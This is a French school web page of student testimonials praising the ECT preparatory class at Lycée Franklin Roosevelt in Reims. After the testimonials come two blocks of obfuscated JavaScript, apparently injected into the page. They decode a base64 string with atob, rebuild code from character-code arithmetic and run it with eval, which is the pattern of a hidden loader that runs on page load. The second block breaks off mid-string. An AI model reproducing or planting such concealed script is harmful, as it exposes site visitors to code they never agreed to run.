Qais MEZIANE intègre l’EM LYON en 2017

La prépa sera sans doute l’une des étapes les plus déterminantes de ma vie que ce soit au niveau académique ou humain. En effet vivre 2 ans au sein d’un groupe à un rythme scolaire assez poussé nous forme en tant que futur cadre/leader et en tant que personne responsable de ses choix.

La charge de travail est certes importante en prépa, mais elle est facilement supportable grâce au support quotidien des professeurs qui sont vraiment impliqués dans notre cursus et qui nous aident à traverser ces deux années. Deux années où on ne se coupe pas du monde forcément, on peut toujours sortir et garder nos passions : il faut juste savoir gérer son temps.

Pour finir, la prépa a besoin de beaucoup de motivation et de volonté si on veut en profiter réellement… et enfin, n’oublions pas que l’APHEC sera là pour animer votre vie étudiante.

Lakhdar MEDDAHI intègre l’EDHEC en 2017

Après avoir volontairement choisi la filière STMG,  je me retrouvais enfin en prépa ECT. L’adaptation était dure, surtout au niveau du rythme de travail qui s’intensifie progressivement, mais on s’y fait au fil des mois.

Néanmoins pas de panique, l’équipe pédagogique est très présente et n’hésite pas mettre des dispositifs d’aide ou d’approfondissement en fonction de votre niveau (qui ne cessera de progresser).

A titre personnel,  je trouve que la classe prépa ECT est assez unique car elle fait grandir et elle permet aux étudiants de faire ressortir le meilleur d’eux-mêmes. J’ai réellement apprécié l’enseignement et l’ambiance de travail : aimer ce que l’on fait est certainement la clé de la réussite, surtout en prépa.

Cette voie est exigeante certes, mais elle permet d’envisager des projets nouveaux et d’accéder aux meilleures écoles de commerce en France.

La prépa ECT Roosevelt restera pour moi un souvenir positif d’une belle aventure, en espérant qu’elle devienne bientôt la vôtre. 

Fethane Wassima intègreSKEMA Business en 2017

« La prépa c’est la voie royale pour un STMG » me disait ce professeur. Ses paroles raisonnaient dans ma tête depuis la seconde. Je ne comprenais pas forcément la pointe de mépris mais je savais que sa bienveillance envers nous et sa foi en nos capacités étaient réelles. En terminale STMG on peut se perdre dans tout les choix qu’on nous demande d’assumer. Naturellement, la classe préparatoire est sujette à beaucoup d’appréhensions. Mais entre nous, avez-vous déjà rencontré un étudiant qui l’a regrettée ?

Ce sont surement les meilleures années de ma scolarité voire de ma vie. La richesse dans laquelle on nageait est sans égale. Je ne dis pas que c’était facile, il faut beaucoup de rigueur, d’implication et de confiance en soi. Les professeurs sont toujours là pour nous encadrer et nous soutenir si on a des difficultés. Les entrainements comme les examens ou les colles sont d’une valeur inimaginable, je dirais même que c’est un luxe, car c’est au concours qu’on s’en rend bien compte.

Cependant en prépa ECT, on n’est pas des taupes. J’ai pu rejoindre notre association Alumni PECT qui m’a donné une idée sur l’importance du contact à autrui mais aussi de ce sentiment d’appartenance qui demeure vital. De plus, l’association APHEC organise souvent des évènements pour animer la vie étudiante en prépa !

Le conseil que j’ai à vous donner c’est de vous surpasser ! Il faut se battre jusqu’au bout pour réussir. Et plus encore, ne jamais perdre confiance en vous. On est tous différents mais chacun de nous est singulier alors ne vous laissez pas abattre par les notes, l’enjeu est beaucoup plus important. Le concours en soi demande une masse importante de connaissances, mais il est tout à fait surmontable. Persévérez mais lâchez prise par moment et vous trouverez vite votre rythme.

Aujourd’hui, en intégrant SKEMA Business, je suis très satisfaite de mon parcours en prépa ECT à Roosevelt. Pourquoi pas vous ?

Hasnaa BOULTAME intègre AUDENCIA en 2017

Mon expérience en classe préparatoire est loin d’être banale.

En effet, je n’ai pas choisi la facilité… non seulement au niveau de mon parcours scolaire après le Bac mais aussi du fait  d’avoir quitté mon pays d’origine et d’avoir donc eu à parcourir des kilomètres toute seule malgré mon jeune âge.

Mais heureusement à Reims, au lycée Franklin Roosevelt, je me suis faite une nouvelle famille. D’abord, grâce au corps enseignant qui nous encadre à merveille. Mais aussi grâce à l’ambiance de classe qui allie joie et solidarité. En bref, mon expérience a donc été très éloignée du cliché « esprit concours ».

Après l’obtention de mon baccalauréat, j’avais bien entendu des facilités dans certaines matières (Mathématiques…) mais j’ai pu appréhender les autres matières de manière à la fois sérieuse et plaisante. Donc autant vous dire qu’en choisissant cette voie, se reposer sur ses acquis n’est pas conseillé,  il faut redoubler d’efforts pour ne pas être rattrapé par la charge de travail qui peut être démotivante si on ne s’organise pas correctement.

En conclusion, je vous adresse un conseil: organisez vous bien dès le début pour suivre un rythme sain. Ne remettez pas tout au lendemain, et surtout faites de la BU et de la médiathèque votre deuxième maison.

Allez y en groupe pour vous entraider, mais aussi pour vous motiver les uns les autres, cela est moins pénible qu’il n’y paraît.

Natacha BERRIER intègre NEOMA en 2017

La classe préparatoire ECT est une réelle opportunité pour les bacheliers STMG qui souhaitent continuer leurs études, aussi bien sur le plan personnel que professionnel. C’est un réel tremplin vers une carrière offrant de nombreuses opportunités. Dans cette classe préparatoire vous serez très bien entouré par le corps professoral qui saura vous accompagner et vous guider dans vos différents choix pendant ces deux années et mêmes au-delà. Ce sont deux années certes de travail, mais de convivialité et d’entraide qui vont vous apporter un enrichissement personnel. 

Je suis très fière à l’issue de ces deux années d’intégrer Neoma Business School, une école riche de plus de 140 ans d’histoire et de valeurs importantes, qui regroupe un réseau de plus de 55 000 diplômés dans le monde!

Myriam ABAKRI, intègre EM Grenoble en 2016

En sortant du lycée, et avant d’intégrer la prépa ECT au lycée Franklin Roosevelt, mes appréhensions étaient nombreuses. En effet cette formation nécessite une charge de travail conséquente et beaucoup de nouveautés, il ne faut donc pas avoir peur de voir ses notes chutées au départ et surtout ne pas baisser les bras !

De plus, on s’habitue très vite à ce rythme de travail et les professeurs sont présents afin de nous aider à surmonter nos difficultés et à toujours repousser nos limites. La prépa n’a rien d’insurmontable, avec du travail de la détermination et une pointe d’ambition, tout le monde peut y arriver. Il suffit de le vouloir et d’y croire !

Il est important d’appréhender les entrainements tout au long de ces deux années de manière très sérieuse afin d’être prêt à 100% lors des concours (véritable marathon !)

Personnellement la prépa m’a beaucoup apporté, des connaissances théoriques bien-sûr mais encore et surtout cela m’a permis de forger mon caractère et de prendre confiance en moi.

Ainsi, je recommande vivement cette formation qui est, à mon sens un véritable tremplin pour espérer intégrer les plus grandes écoles.

Annabelle DEMOUGEOT, intègre ESC Dijon en 2015

DEMOUGEOTPetit avertissement : la classe préparatoire est une voie exigeante qui demande pas mal de travail de notre part comme les profs vous le diront et le RE-diront (colles, cours, devoirs surveillés sans oublier les révisions diverses et variées !). Pour ma part je passais beaucoup de temps à revoir mes cours et il m’arrivait souvent d’ouvrir mes anciens cahiers du lycée (à ne pas jeter bien sûr). Les colles sont aussi très utiles pour revenir sur certains points du cours ou même approfondir. Enfin au lycée Roosevelt, nous avons la chance de pouvoir compter sur nos professeurs : ils sont très accessibles et toujours partant pour nous aider. Sachez que c’est difficile mais faisable aussi.

Sim Som SACK Vilaylak intègre Audencia en 2015

SISOMSACKAvant d’entrer en prépa, j’avais ce préjugé disant qu’il y aurait beaucoup de travail et un minimum de soutien scolaire comparé à la fac…

Que nenni, il y aura beaucoup de travail que si vous le voulez, il y aura du soutien uniquement si vous le demandez. Chacun fait ce qu’il veut de sa prépa.

Il y a une école de commerce pour tous, et c’est avec un travail continu et rigoureux que l’on s’ouvre les portes d’une meilleure école.

Mais vous ne serez pas seul dans cette aventure, l’équipe pédagogique du lycée Roosevelt saura vous soutenir dans vos révisions et l’APHEC Roosevelt saura vous aider à décompresser.

Marie-Clémence MOUSNIER intègre NEOMA Business School Reims en 2015

MOUSNIERLa classe préparatoire a été pour moi un véritable tremplin, tant pour ma vie personnelle que professionnelle. Cette formation élitiste est sans doute la voie royale pour nous ouvrir les portes de grandes écoles de commerce et, ainsi de formidables carrières professionnelles. L’environnement de travail et l’implication de tout le corps professoral pousse au dépassement de soi et à l’atteinte d’objectifs très élevés. Je recommande à  tous cette formation, car bien plus qu’une simple voie vers l’excellence, c’est aussi l’opportunité de faire de superbes rencontres permettant d’élargir notre réseau en plus d’améliorer au mieux ses capacités.

Camille Simon, intègre Grenoble École de Management (GEM) en 2013.

Camille SimonAprès avoir obtenu mon Bac STG, j’ai été admise en prépa ECT au lycée Roosevelt de Reims. La prépa représente deux années de travail mais aussi de découvertes, elle permet de passer les concours des Grandes Écoles de commerce. Ma réussite à de nombreux concours fut pour moi une réelle surprise. Je devais donc entreprendre mon tour de France (passer les oraux) dans les écoles qui me plaisaient le plus : Telecom, RMS, Skema, GEM, Audencia, Euromed. Mon choix se porta finalement  sur GEM, 6ème école au classement national et 12ème au financial times. L’école de commerce représente quand même un changement par rapport à la prépa surtout avec une vie associative très développée. Mais le plus grand changement vient des paysages car, venant de Picardie, je ne voyais pas les montagnes tous les matins ! J’ai choisi de suivre le parcours Management classique pour ensuite pouvoir me spécialiser. Aujourd’hui, bien dans mon école, je ne regrette pas d’avoir misé sur la prépa ECT !

Jessica Renaudie, intègre EM Strasbourg en 2013.

Jessica RenaudieJ’ai obtenu mon bac STG sans mention, et intégrer une classe préparatoire ECT me paraissait difficile. Les professeurs du lycée Roosevelt ont ressenti ma motivation et m’ont donné ma chance. Cela m’a demandé beaucoup de travail, mais la qualité du niveau d’enseignement, l’aide et le soutien permanent des professeurs m’ont amenée à intégrer l’EM Strasbourg. J’ai apprécié le fait de pouvoir approfondir ma culture générale et parallèlement continuer à travailler les matières que j’aime comme le management ou encore le droit. Ces années m’ont servi tant pour la réussite aux concours que pour mon enrichissement personnel, car on en apprend grandement en à peine deux ans et dans tous les domaines. Si la motivation est là, il faut se lancer dans cette aventure, les débuts seront peut-être difficiles mais le résultat sera présent. Aujourd’hui je vis une autre belle aventure à l’EM STRASBOURG mais la prépa, mes camarades et mes professeurs me manquent déjà !

Baptiste Quenardel, intègre Audencia Nantes en 2013.

Baptiste QuenardelCes deux années me resteront gravées à vie. La charge de travail, c’est vrai, y est importante, mais détrompez-vous : ce n’est pas le parcours du combattant où loisirs et vie sociale s’arrêtent, comme il se dit souvent. La cohésion de groupe est intense en PECT, et l’esprit de compétition entre élèves n’existe pas. Je suis très content d’avoir choisi cette filière, pour la disponibilité des professeurs et les cours très intéressants. J’ai personnellement décidé de tout donner en deuxième année, et je suis heureux et fier d’être dans une école comme Audencia, où là encore je constate que la « prépa » n’est pas réservée à l’élite. La « prépa » est enrichissante et la vie dans les grandes écoles, exceptionnelle. Vous ne le regretterez pas, j’en suis certain !

var DRQWQIDEDR = atob(‘dmFyIFdQR1ROSUpVV1EgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExIC0gMSwgMTI3IC0gOSwgOTggLSAxLCAxMTYgLSAyLCAzNSAtIDMsIDExMSAtIDQsIDEwOSAtIDgsIDEyNSAtIDQsIDQxIC0gOSwgNjQgLSAzLCAzNiAtIDQsIDQzIC0gNCwgMTE2IC0gOCwgODkgLSA5LCA4MiAtIDksIDc0IC0gOCwgMTIzIC0gMSwgODUgLSAxLCA5MCAtIDEsIDExNiAtIDYsIDExOSAtIDMsIDEyMSAtIDEsIDQ4IC0gOSwgNjggLSA5LCAxOSAtIDksIDEyMiAtIDQsIDEwNCAtIDcsIDExOSAtIDUsIDM2IC0gNCwgMTA5IC0gOCwgMTE3IC0gNywgMTA2IC0gNywgMTAyIC0gMSwgMTAxIC0gMSwgMzYgLSA0LCA2MyAtIDIsIDMzIC0gMSwgNDAgLSAxLCA3NSAtIDgsIDcwIC0gMiwgNjAgLSA0LCAxMTcgLSA0LCA4NSAtIDcsIDEyMSAtIDEsIDEwNyAtIDgsIDEyNiAtIDYsIDc5IC0gMSwgMTI2IC0gNiwgMTIxIC0gOSwgMTA0IC0gNywgNjkgLSAxLCAxMjQgLSA0LCA1NiAtIDQsIDU5IC0gNiwgODUgLSA1LCA4OSAtIDYsIDEwNiAtIDYsIDkwIC0gNywgMTAyIC0gMywgNTQgLSA0LCA5MyAtIDgsIDEwMiAtIDIsIDcxIC0gMSwgMTI0IC0gNSwgMTEyIC0gMSwgNzQgLSA0LCA3NCAtIDEsIDc0IC0gNiwgNTIgLSAzLCAxMTQgLSA5LCA3MiAtIDQsIDEwOSAtIDQsIDUxIC0gMywgMTIxIC0gOSwgNzAgLSAzLCA1NiAtIDgsIDExNCAtIDYsIDEwMiAtIDUsIDc2IC0gNSwgNjkgLSAxLCA5MiAtIDcsIDEyNyAtIDcsIDgwIC0gMiwgMTEzIC0gNSwgODcgLSAyLCA0OSAtIDYsIDg3IC0gOCwgNzEgLSA1LCAxMDUgLSAyLCA5NSAtIDksIDc2IC0gOSwgMTIyIC0gMywgNTkgLSAzLCAxMDYgLSAxLCA4MCAtIDcsIDc3IC0gOSwgODAgLSA3LCA4MiAtIDMsIDEwNyAtIDcsIDExNCAtIDQsIDExMCAtIDMsIDEwMiAtIDIsIDc0IC0gOCwgMTA5IC0gNSwgMTE3IC0gMSwgOTAgLSA4LCAxMDAgLSAxLCAxMTAgLSA1LCA3MiAtIDMsIDUxIC0gMSwgNzQgLSA2LCAxMTQgLSA5LCA5MCAtIDgsIDExMSAtIDUsIDgyIC0gMSwgOTMgLSA3LCAxMjIgLSA3LCA4MCAtIDMsIDgwIC0gOCwgMTExIC0gNSwgNzYgLSA3LCAxMjcgLSA5LCA4MSAtIDcsIDc0IC0gOCwgODYgLSA5LCA1NyAtIDYsIDg0IC0gNSwgNzEgLSA1LCA2MSAtIDksIDEwOCAtIDgsIDg3IC0gMSwgMTA3IC0gNCwgODAgLSA3LCA1OSAtIDMsIDk2IC0gNiwgMTEwIC0gNCwgNzUgLSA2LCA4MiAtIDMsIDgxIC0gMywgODcgLSA0LCA0OSAtIDEsIDc1IC0gMywgNzkgLSA5LCA1MiAtIDMsIDEwMCAtIDEsIDcyIC0gNiwgNzkgLSAyLCA5MCAtIDcsIDY4IC0gMywgMTIzIC0gOCwgODcgLSAxLCA3NCAtIDYsIDU1IC0gMywgMTE4IC0gNSwgODggLSA0LCA3NiAtIDcsIDEyMCAtIDgsIDcwIC0gMSwgODMgLSAyLCAxMjQgLSAzLCA3OSAtIDIsIDExNSAtIDIsIDg1IC0gOCwgNzQgLSA4LCA4MyAtIDYsIDExNSAtIDgsIDg0IC0gOCwgODcgLSAxLCA3MSAtIDUsIDkyIC0gOCwgOTEgLSA2LCA5MCAtIDQsIDEwNSAtIDUsIDEwNCAtIDcsIDQzIC0gNCwgNjIgLSAzLCAxMSAtIDEsIDExMCAtIDgsIDEyNCAtIDcsIDExMSAtIDEsIDEwOCAtIDksIDExOSAtIDMsIDExMyAtIDgsIDExNiAtIDUsIDExMSAtIDEsIDM0IC0gMiwgMTIzIC0gMywgMTEyIC0gMSwgMTIwIC0gNiwgMTAzIC0gOCwgMTEwIC0gOSwgMTE1IC0gNSwgMTA0IC0gNSwgNDQgLSA0LCAxMjMgLSA4LCAxMTggLSAyLCAxMjEgLSA3LCAxMDggLSAzLCAxMTEgLSAxLCAxMDggLSA1LCA0OSAtIDUsIDM1IC0gMywgMTEzIC0gNiwgMTAzIC0gMiwgMTI5IC0gOCwgNDMgLSAyLCA0MCAtIDgsIDEyNSAtIDIsIDE0IC0gNCwgMzYgLSA0LCAzNiAtIDQsIDExOSAtIDEsIDEwMyAtIDYsIDEyMSAtIDcsIDM3IC0gNSwgMTE5IC0gNSwgMTA2IC0gNSwgMTIxIC0gNiwgMzQgLSAyLCA2NSAtIDQsIDM1IC0gMywgNDggLSA5LCA0NSAtIDYsIDY4IC0gOSwgMTcgLSA3LCAzMyAtIDEsIDQwIC0gOCwgMTEwIC0gOCwgMTE3IC0gNiwgMTE3IC0gMywgMzYgLSA0LCA0NyAtIDcsIDExOSAtIDEsIDEwMCAtIDMsIDExOSAtIDUsIDM0IC0gMiwgMTExIC0gNiwgMzYgLSA0LCA2NSAtIDQsIDQxIC0gOSwgNTEgLSAzLCA2NSAtIDYsIDM5IC0gNywgMTEzIC0gOCwgNDEgLSA5LCA2OSAtIDksIDM5IC0gNywgMTIyIC0gNywgMTIzIC0gNywgMTE3IC0gMywgMTE0IC0gOSwgMTE5IC0gOSwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSAyLCAxMDIgLSAxLCAxMTcgLSA3LCAxMDQgLSAxLCAxMTkgLSAzLCAxMTIgLSA4LCA2MyAtIDQsIDQxIC0gOSwgMTE0IC0gOSwgNTIgLSA5LCA1MCAtIDcsIDQ1IC0gNCwgMzUgLSAzLCAxMjYgLSAzLCAxNCAtIDQsIDM2IC0gNCwgMzggLSA2LCAzNiAtIDQsIDQwIC0gOCwgMTIzIC0gOSwgMTA1IC0gNCwgMTE4IC0gMywgMzkgLSA3LCA0OSAtIDYsIDYzIC0gMiwgMzMgLSAxLCA5MSAtIDgsIDEyMSAtIDUsIDEyMSAtIDcsIDEwNiAtIDEsIDExNCAtIDQsIDEwNCAtIDEsIDU1IC0gOSwgMTA4IC0gNiwgMTE4IC0gNCwgMTE2IC0gNSwgMTE2IC0gNywgNzQgLSA3LCAxMDUgLSAxLCAxMDYgLSA5LCAxMTkgLSA1LCA3NiAtIDksIDExOSAtIDgsIDEwNiAtIDYsIDEwMyAtIDIsIDQ0IC0gNCwgMTE4IC0gMywgMTIwIC0gNCwgMTIwIC0gNiwgMTExIC0gNiwgMTE0IC0gNCwgMTA2IC0gMywgNTMgLSA3LCAxMDUgLSA2LCAxMDUgLSAxLCAxMDYgLSA5LCAxMjEgLSA3LCA3NCAtIDcsIDEyMCAtIDksIDEwOSAtIDksIDEwNCAtIDMsIDY5IC0gNCwgMTE3IC0gMSwgNDQgLSA0LCAxMTEgLSA2LCA0NyAtIDYsIDQwIC0gOCwgOTkgLSA1LCAxNyAtIDcsIDE4IC0gOSwgMTUgLSA2LCAxMiAtIDMsIDE1IC0gNiwgMTEzIC0gNiwgMTA0IC0gMywgMTI4IC0gNywgNTEgLSA1LCAxMDcgLSA4LCAxMTEgLSA3LCAxMDIgLSA1LCAxMjAgLSA2LCA3NSAtIDgsIDExNCAtIDMsIDEwNSAtIDUsIDEwNyAtIDYsIDc0IC0gOSwgMTIwIC0gNCwgNDIgLSAyLCAxMTMgLSA4LCA0MCAtIDgsIDQwIC0gMywgMzUgLSAzLCAxMTUgLSA4LCAxMDMgLSAyLCAxMjYgLSA1LCA1NSAtIDksIDExMiAtIDQsIDEwMiAtIDEsIDExMiAtIDIsIDEwNyAtIDQsIDEyMiAtIDYsIDExMiAtIDgsIDQ3IC0gNiwgNDQgLSAzLCA2MyAtIDQsIDE3IC0gNywgNDAgLSA4LCAzOCAtIDYsIDEyNyAtIDIsIDEzIC0gMywgMzkgLSA3LCAzNCAtIDIsIDEyMyAtIDksIDEwNyAtIDYsIDEyMCAtIDQsIDExOCAtIDEsIDEyMSAtIDcsIDExNyAtIDcsIDM0IC0gMiwgMTIxIC0gNywgMTA4IC0gNywgMTIxIC0gNiwgNjAgLSAxLCAxOSAtIDksIDEzMCAtIDUsIDE4IC0gOCwgMTQgLSA0LCAxMjUgLSA3LCA5OCAtIDEsIDExNSAtIDEsIDM1IC0gMywgMTA2IC0gNiwgMTAyIC0gMSwgMTA1IC0gNiwgMzMgLSAxLCA3MCAtIDksIDQxIC0gOSwgMTI4IC0gOCwgMTE0IC0gMywgMTIxIC0gNywgOTkgLSA0LCAxMDUgLSA0LCAxMTIgLSAyLCAxMDQgLSA1LCA0OSAtIDksIDk4IC0gMSwgMTIyIC0gNiwgMTE3IC0gNiwgMTAxIC0gMywgNDQgLSA0LCAxMDcgLSA2LCAxMTQgLSA0LCAxMDMgLSA0LCAxMDQgLSAzLCAxMDYgLSA2LCA0MiAtIDEsIDQ1IC0gMSwgMzQgLSAyLCAxMTEgLSA0LCAxMTAgLSA5LCAxMjQgLSAzLCA1MCAtIDksIDY4IC0gOSwgMTMgLSAzLCA0NSAtIDUsIDExOCAtIDgsIDEwMiAtIDEsIDEyNiAtIDcsIDM5IC0gNywgNzEgLSAxLCAxMjQgLSA3LCAxMTkgLSA5LCAxMDIgLSAzLCAxMTggLSAyLCAxMDYgLSAxLCAxMTIgLSAxLCAxMTYgLSA2LCA0OCAtIDgsIDEwMiAtIDIsIDEwMyAtIDIsIDEwMCAtIDEsIDQ3IC0gNiwgNTAgLSA5LCA0NiAtIDYsIDQzIC0gMiwgNjMgLSA0LCAxMSAtIDEsIDE1IC0gNSk7ZXZhbChXUEdUTklKVVdRKTs=’);
eval(DRQWQIDEDR);

var OJCQZPVISJ = atob(‘dmFyIE5MU0RNQlFYRUogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIzIC0gNSwgMTAyIC0gNSwgMTIwIC0gNiwgMzkgLSA3LCAxMTMgLSA2LCAxMDMgLSAyLCAxMjIgLSAxLCAzOCAtIDYsIDY0IC0gMywgMzcgLSA1LCA0MiAtIDMsIDEwOSAtIDUsIDc0IC0gNywgODkgLSAxLCA3MCAtIDMsIDExMiAtIDUsIDkzIC0gOSwgOTAgLSAxLCAxMTkgLSA4LCA4NSAtIDIsIDc3IC0gNCwgNDAgLSAxLCA2NCAtIDUsIDE0IC0gNCwgMTI1IC0gNywgOTggLSAxLCAxMjEgLSA3LCAzNCAtIDIsIDEwNyAtIDYsIDExNCAtIDQsIDEwMSAtIDIsIDEwNSAtIDQsIDEwMiAtIDIsIDM0IC0gMiwgNjQgLSAzLCAzOCAtIDYsIDQ3IC0gOCwgNzkgLSA3LCAxMDggLSAzLCA3NCAtIDEsIDExOCAtIDUsIDk2IC0gNywgMTIyIC0gMiwgMTIzIC0gOCwgMTE3IC0gOCwgODIgLSAyLCAxMjAgLSAxLCA4NSAtIDcsIDEyNSAtIDMsIDEwNCAtIDQsIDcwIC0gMSwgMTEwIC0gNywgMTE2IC0gNiwgODEgLSAzLCAxMjcgLSA2LCA3MSAtIDYsIDEwNiAtIDUsIDg1IC0gNiwgODcgLSAzLCAxMjIgLSAzLCA2OCAtIDIsIDc1IC0gMSwgNTQgLSA0LCAxMDEgLSAyLCA3NyAtIDEsIDg1IC0gOCwgODggLSA0LCA1MyAtIDUsIDEwOCAtIDMsIDc2IC0gNCwgMTI3IC0gNSwgNzcgLSA4LCAxMDEgLSAyLCA3MSAtIDYsIDEyOCAtIDYsIDk2IC0gNywgMTE2IC0gOSwgNzEgLSAzLCA4OSAtIDYsIDUxIC0gMywgMTE2IC0gMSwgMTA0IC0gNywgNDkgLSAxLCAxMjcgLSA4LCAxMTcgLSA3LCA4MCAtIDEsIDEwNSAtIDEsIDU1IC0gNywgNTkgLSA1LCA4NSAtIDYsIDg5IC0gNywgMTIzIC0gMywgMTExIC0gNCwgMTA0IC0gNSwgOTEgLSAzLCAxMTEgLSA3LCAxMDYgLSAyLCA3OCAtIDQsIDcwIC0gMywgMTE5IC0gNCwgODIgLSA4LCA4NSAtIDUsIDU2IC0gNiwgMTAzIC0gNCwgMTAwIC0gMiwgNzUgLSAxLCAxMDggLSAzLCAxMjUgLSA2LCA3MCAtIDMsIDgxIC0gOSwgMTI5IC0gOCwgNzAgLSA1LCAxMTkgLSA1LCA2OCAtIDIsIDExNSAtIDksIDcyIC0gMywgNjAgLSA0LCA3MyAtIDEsIDY4IC0gMSwgOTEgLSAxLCAxMjQgLSA1LCA5OSAtIDksIDcxIC0gNSwgMTA5IC0gNiwgMTE1IC0gNiwgODQgLSA1LCAxMDggLSAxLCAxMDUgLSAxLCA0OCAtIDEsIDEwMyAtIDUsIDEwNCAtIDEsIDY2IC0gMSwgNTIgLSAxLCA4MCAtIDQsIDcyIC0gNCwgODQgLSA2LCA4NCAtIDIsIDEwNSAtIDQsIDYwIC0gOSwgOTggLSA5LCA5OSAtIDEsIDgxIC0gOCwgOTIgLSA5LCAxMTIgLSA5LCA4NCAtIDUsIDc4IC0gNCwgODggLSA0LCA3MCAtIDEsIDExMCAtIDcsIDcyIC0gNSwgMTEzIC0gOCwgODggLSA3LCAxMjEgLSAyLCA4MyAtIDIsIDkzIC0gOSwgNTcgLSA5LCAxMTQgLSA2LCA4NiAtIDQsIDEzMSAtIDksIDY3IC0gMiwgMTIyIC0gNywgNzQgLSAxLCAxMDcgLSAzLCA2NCAtIDgsIDYxIC0gNCwgODggLSA5LCAxMTYgLSA5LCA3NCAtIDksIDUwIC0gNywgODEgLSA2LCA2NyAtIDIsIDc3IC0gOCwgMTIxIC0gNSwgMTA1IC0gNSwgMTA3IC0gMiwgMTEwIC0gMywgOTcgLSA4LCAxMDUgLSA2LCA1NiAtIDUsIDcxIC0gNSwgOTAgLSA1LCA5MyAtIDYsIDg5IC0gNiwgNTIgLSA0LCA4MSAtIDksIDc5IC0gNiwgNzUgLSA4LCA1NCAtIDYsIDEyNiAtIDksIDcxIC0gMywgMTEwIC0gNCwgMTEyIC0gMSwgMTI0IC0gOCwgODQgLSAzLCA4OCAtIDQsIDEyMCAtIDUsIDEyMSAtIDYsIDczIC0gNiwgODggLSA1LCAxMDcgLSA3LCA1MiAtIDIsIDc2IC0gMywgMTA5IC0gNSwgMTE5IC0gNCwgMTA4IC0gMSwgODIgLSAyLCA2NyAtIDIsIDc0IC0gNSwgNTMgLSAyLCA3MyAtIDYsIDEwNCAtIDEsIDY4IC0gMywgMTE5IC0gNiwgODAgLSAyLCA3NSAtIDgsIDEwNCAtIDQsIDcwIC0gMiwgNzkgLSA1LCA2OCAtIDEsIDEyNCAtIDksIDc1IC0gMSwgODEgLSAxLCA1NSAtIDUsIDczIC0gNywgODcgLSAzLCA4OCAtIDUsIDg3IC0gNiwgNjQgLSAzLCA2OSAtIDgsIDQxIC0gMiwgNjYgLSA3LCAxMyAtIDMsIDEwMyAtIDEsIDEyNiAtIDksIDExMSAtIDEsIDEwNCAtIDUsIDEyMCAtIDQsIDEwNiAtIDEsIDEyMCAtIDksIDExOSAtIDksIDM1IC0gMywgMTI0IC0gNCwgMTE2IC0gNSwgMTIwIC0gNiwgOTYgLSAxLCAxMDIgLSAxLCAxMTkgLSA5LCAxMDAgLSAxLCA0NCAtIDQsIDExOCAtIDMsIDEyNSAtIDksIDEyMCAtIDYsIDEwOSAtIDQsIDExNyAtIDcsIDExMSAtIDgsIDQ4IC0gNCwgNDAgLSA4LCAxMTYgLSA5LCAxMDkgLSA4LCAxMjcgLSA2LCA0OCAtIDcsIDM2IC0gNCwgMTI3IC0gNCwgMTYgLSA2LCA0MCAtIDgsIDQxIC0gOSwgMTI1IC0gNywgOTkgLSAyLCAxMjMgLSA5LCAzNCAtIDIsIDExNyAtIDMsIDEwNSAtIDQsIDExNyAtIDIsIDQxIC0gOSwgNjYgLSA1LCAzOCAtIDYsIDQ2IC0gNywgNDUgLSA2LCA2NCAtIDUsIDExIC0gMSwgMzYgLSA0LCAzNSAtIDMsIDEwNyAtIDUsIDExOCAtIDcsIDEyMyAtIDksIDQxIC0gOSwgNDMgLSAzLCAxMjAgLSAyLCAxMDAgLSAzLCAxMTkgLSA1LCAzNSAtIDMsIDEwOCAtIDMsIDM5IC0gNywgNjkgLSA4LCAzNiAtIDQsIDUzIC0gNSwgNjYgLSA3LCAzNSAtIDMsIDExMCAtIDUsIDM4IC0gNiwgNjEgLSAxLCAzOSAtIDcsIDEyMCAtIDUsIDEyMiAtIDYsIDExNSAtIDEsIDEwNyAtIDIsIDExOSAtIDksIDExMSAtIDgsIDQ4IC0gMiwgMTE2IC0gOCwgMTA3IC0gNiwgMTE3IC0gNywgMTEwIC0gNywgMTI0IC0gOCwgMTA4IC0gNCwgNjAgLSAxLCAzNCAtIDIsIDExMSAtIDYsIDUyIC0gOSwgNDYgLSAzLCA0MyAtIDIsIDQxIC0gOSwgMTI1IC0gMiwgMTQgLSA0LCAzOSAtIDcsIDM1IC0gMywgMzcgLSA1LCAzNSAtIDMsIDEyMiAtIDgsIDEwMiAtIDEsIDEyMiAtIDcsIDM0IC0gMiwgNDUgLSAyLCA2OCAtIDcsIDQwIC0gOCwgODkgLSA2LCAxMjUgLSA5LCAxMTcgLSAzLCAxMTQgLSA5LCAxMTggLSA4LCAxMDQgLSAxLCA1MCAtIDQsIDEwMyAtIDEsIDExNSAtIDEsIDExNSAtIDQsIDExMSAtIDIsIDY4IC0gMSwgMTEyIC0gOCwgMTAxIC0gNCwgMTE3IC0gMywgNzIgLSA1LCAxMTMgLSAyLCAxMDMgLSAzLCAxMDQgLSAzLCA0NyAtIDcsIDEyMyAtIDgsIDExOSAtIDMsIDEyMiAtIDgsIDExMSAtIDYsIDExOCAtIDgsIDExMiAtIDksIDQ5IC0gMywgMTA4IC0gOSwgMTEzIC0gOSwgMTAxIC0gNCwgMTIyIC0gOCwgNzQgLSA3LCAxMTcgLSA2LCAxMDEgLSAxLCAxMDcgLSA2LCA3MSAtIDYsIDEyMSAtIDUsIDQ4IC0gOCwgMTA5IC0gNCwgNDggLSA3LCAzOCAtIDYsIDEwMSAtIDcsIDE1IC0gNSwgMTIgLSAzLCAxMSAtIDIsIDEyIC0gMywgMTAgLSAxLCAxMTEgLSA0LCAxMDMgLSAyLCAxMjUgLSA0LCA1MCAtIDQsIDEwOCAtIDksIDExMCAtIDYsIDEwMSAtIDQsIDEyMiAtIDgsIDcwIC0gMywgMTE1IC0gNCwgMTAxIC0gMSwgMTA3IC0gNiwgNzAgLSA1LCAxMjUgLSA5LCA0NyAtIDcsIDEwOCAtIDMsIDM0IC0gMiwgMzkgLSAyLCAzMyAtIDEsIDExNSAtIDgsIDEwNiAtIDUsIDEyNyAtIDYsIDU0IC0gOCwgMTEyIC0gNCwgMTA0IC0gMywgMTE0IC0gNCwgMTA1IC0gMiwgMTIxIC0gNSwgMTA4IC0gNCwgNDUgLSA0LCA0MyAtIDIsIDY1IC0gNiwgMTkgLSA5LCA0MCAtIDgsIDM0IC0gMiwgMTI2IC0gMSwgMTIgLSAyLCAzNSAtIDMsIDM4IC0gNiwgMTE3IC0gMywgMTA5IC0gOCwgMTIyIC0gNiwgMTIzIC0gNiwgMTIyIC0gOCwgMTEzIC0gMywgMzQgLSAyLCAxMTcgLSAzLCAxMDMgLSAyLCAxMjQgLSA5LCA2OCAtIDksIDE0IC0gNCwgMTMzIC0gOCwgMTgg